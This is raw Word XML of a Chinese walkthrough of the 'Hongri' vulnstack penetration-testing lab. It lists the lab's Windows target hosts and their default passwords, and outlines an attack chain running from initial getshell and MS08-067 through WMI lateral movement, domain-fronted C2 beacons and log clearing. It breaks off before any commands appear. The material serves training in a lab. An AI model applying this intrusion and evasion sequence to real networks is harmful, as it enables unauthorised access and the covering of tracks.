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FC90" w14:textId="1790C18D" w:rsidR="000D6077" w:rsidRDefault="00113DE9" w:rsidP="00682028">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00113DE9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>红日靶场</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00113DE9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00113DE9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDFC764" w14:textId="02F142A0" w:rsidR="00113DE9" w:rsidRDefault="00113DE9" w:rsidP="00113DE9">
      <w:pPr>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C95B695" w14:textId="168A76C2" w:rsidR="00113DE9" w:rsidRDefault="00113DE9" w:rsidP="00113DE9">
      <w:pPr>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AE55D7" w14:textId="00FCDE2B" w:rsidR="00682028" w:rsidRDefault="00682028" w:rsidP="00682028">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FAA7FF" w14:textId="1CC42BA0" w:rsidR="00113DE9" w:rsidRDefault="00682028" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00811737">
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t>http://vulnstack.qiyuanxuetang.net/vuln/detail/2/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE356B" w14:textId="78B9CCF0" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场考查内容包括以下几个方面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B697CE8" w14:textId="7363486B" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E99B36" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>环境搭建测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F432AB" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5748B1F8" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE06E02" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE90052" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞搜索与利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBE091B" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>后台</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>上传技巧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047016F2" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:t>系统信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CF5FD" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:t>主机密码收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E5CDF7" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191B5B84" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、内网搜集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4992A82D" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:t>内网</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>继续信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A9C4B" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>8.</w:t>
      </w:r>
      <w:r>
        <w:t>内网攻击姿势</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>信息泄露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5AA9D6" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>9.</w:t>
      </w:r>
      <w:r>
        <w:t>内网攻击姿势</w:t>
      </w:r>
      <w:r>
        <w:t>-MS08-067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20324040" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>10.</w:t>
      </w:r>
      <w:r>
        <w:t>内网攻击姿势</w:t>
      </w:r>
      <w:r>
        <w:t>-SMB</w:t>
      </w:r>
      <w:r>
        <w:t>远程桌面口令猜测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D791FE" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>11.</w:t>
      </w:r>
      <w:r>
        <w:t>内网攻击姿势</w:t>
      </w:r>
      <w:r>
        <w:t>-Oracle</w:t>
      </w:r>
      <w:r>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:t>TNS</w:t>
      </w:r>
      <w:r>
        <w:t>服务漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6308A6B2" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>12.</w:t>
      </w:r>
      <w:r>
        <w:t>内网攻击姿势</w:t>
      </w:r>
      <w:r>
        <w:t>-RPC DCOM</w:t>
      </w:r>
      <w:r>
        <w:t>服务漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEFEA4E" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FCA4E6" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124F0158" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四、横向移动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3551F" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>13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</w:t>
      </w:r>
      <w:r>
        <w:t>文件读取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41158364" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>14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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="715E7A5A" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>15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Getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5088C588" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>16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MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0ECF8B" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>17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MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153CD8DF" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A58A087" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五、构建通道</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151339C1" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>18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</w:t>
      </w:r>
      <w:r>
        <w:t>代理转发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9B6B5F" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E72CF36" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>六、持久控制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45843132" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>19.</w:t>
      </w:r>
      <w:r>
        <w:t>域渗透</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>域成员</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B601843" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>20.</w:t>
      </w:r>
      <w:r>
        <w:t>域渗透</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>基础服务弱口令探测及深度利用之</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="308FBF06" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>21.</w:t>
      </w:r>
      <w:r>
        <w:t>域渗透</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>横向移动</w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A00640" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>22.</w:t>
      </w:r>
      <w:r>
        <w:t>域渗透</w:t>
      </w:r>
      <w:r>
        <w:t>-C2</w:t>
      </w:r>
      <w:r>
        <w:t>命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371C7A26" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>23.</w:t>
      </w:r>
      <w:r>
        <w:t>域渗透</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DomainFronting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>实现对</w:t>
      </w:r>
      <w:r>
        <w:t>beacon</w:t>
      </w:r>
      <w:r>
        <w:t>的深度隐藏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A86E6C9" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>24.</w:t>
      </w:r>
      <w:r>
        <w:t>域渗透</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>域控实现</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>与利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045084D7" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2004DB16" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>七、痕迹清理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCA536C" w14:textId="7555B08F" w:rsidR="00682028" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:t>、日志清理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070CF2E" w14:textId="0DFADB78" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BC23C45" w14:textId="50D99F1A" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B978D8" w14:textId="5D2FA5E0" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB631C" w14:textId="67CC69A2" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FD5FEB" w14:textId="785E4BB8" w:rsidR="008360D9" w:rsidRDefault="008360D9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> hongrisec</w:t>
      </w:r>
      <w:r>
        <w:t>@2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422F2B38" w14:textId="2699C8A8" w:rsidR="00941C8B" w:rsidRDefault="0031792F" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扮演角色：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4F3A3FDB" w14:textId="08B08ABB" w:rsidR="0031792F" w:rsidRDefault="0031792F" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C6D70F" w14:textId="77777777" w:rsidR="0031792F" w:rsidRDefault="0031792F" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EF9045" w14:textId="31175BD8" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t>2003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B49EE" w14:textId="2A1F7DC7" w:rsidR="008360D9" w:rsidRDefault="008360D9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pP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hongrisec</w:t>
      </w:r>
      <w:r>
        <w:t>@2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30542841" w14:textId="1129D228" w:rsidR="00701FC4" w:rsidRDefault="0031792F" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扮演角色：</w:t>
      </w:r>
      <w:r w:rsidR="00EE7D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域成员</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E35B567" w14:textId="0D7CE3BF" w:rsidR="0031792F" w:rsidRDefault="0031792F" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B39DA20" w14:textId="77777777" w:rsidR="0031792F" w:rsidRDefault="0031792F" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130542EA" w14:textId="3CA99658" w:rsidR="0031792F" w:rsidRDefault="0031792F" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t>2008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F98C9A" w14:textId="1114D8C3" w:rsidR="008360D9" w:rsidRPr="008360D9" w:rsidRDefault="008360D9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Admin</w:t>
      </w:r>
      <w:r>
        <w:t>123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34228750" w14:textId="4C2A4CE9" w:rsidR="00701FC4" w:rsidRDefault="0031792F" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扮演角色：</w:t>
      </w:r>
      <w:r w:rsidR="00701FC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320CE44" w14:textId="2C95E9E9" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3B5601" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767A9EF7" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFEA5C8" w14:textId="77777777" w:rsidR="00701FC4" w:rsidRDefault="00701FC4" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE8954D" w14:textId="6B681485" w:rsidR="00682028" w:rsidRPr="00682028" w:rsidRDefault="00701FC4" w:rsidP="00701FC4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外围打点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1E3B11" w14:textId="4A20CD77" w:rsidR="00682028" w:rsidRDefault="00701FC4" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标主机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677735A1" w14:textId="1F74B3E7" w:rsidR="00941C8B" w:rsidRDefault="00827986" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为电脑性能原因只开启了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这一台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器，先完成外围打点渗透，因此暂时没有域环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F9C33D" w14:textId="3CC3D081" w:rsidR="006E7889" w:rsidRDefault="006E7889" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F22BA6F" w14:textId="7A88275A" w:rsidR="006E7889" w:rsidRDefault="004226D9" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E7889">
        <w:rPr>
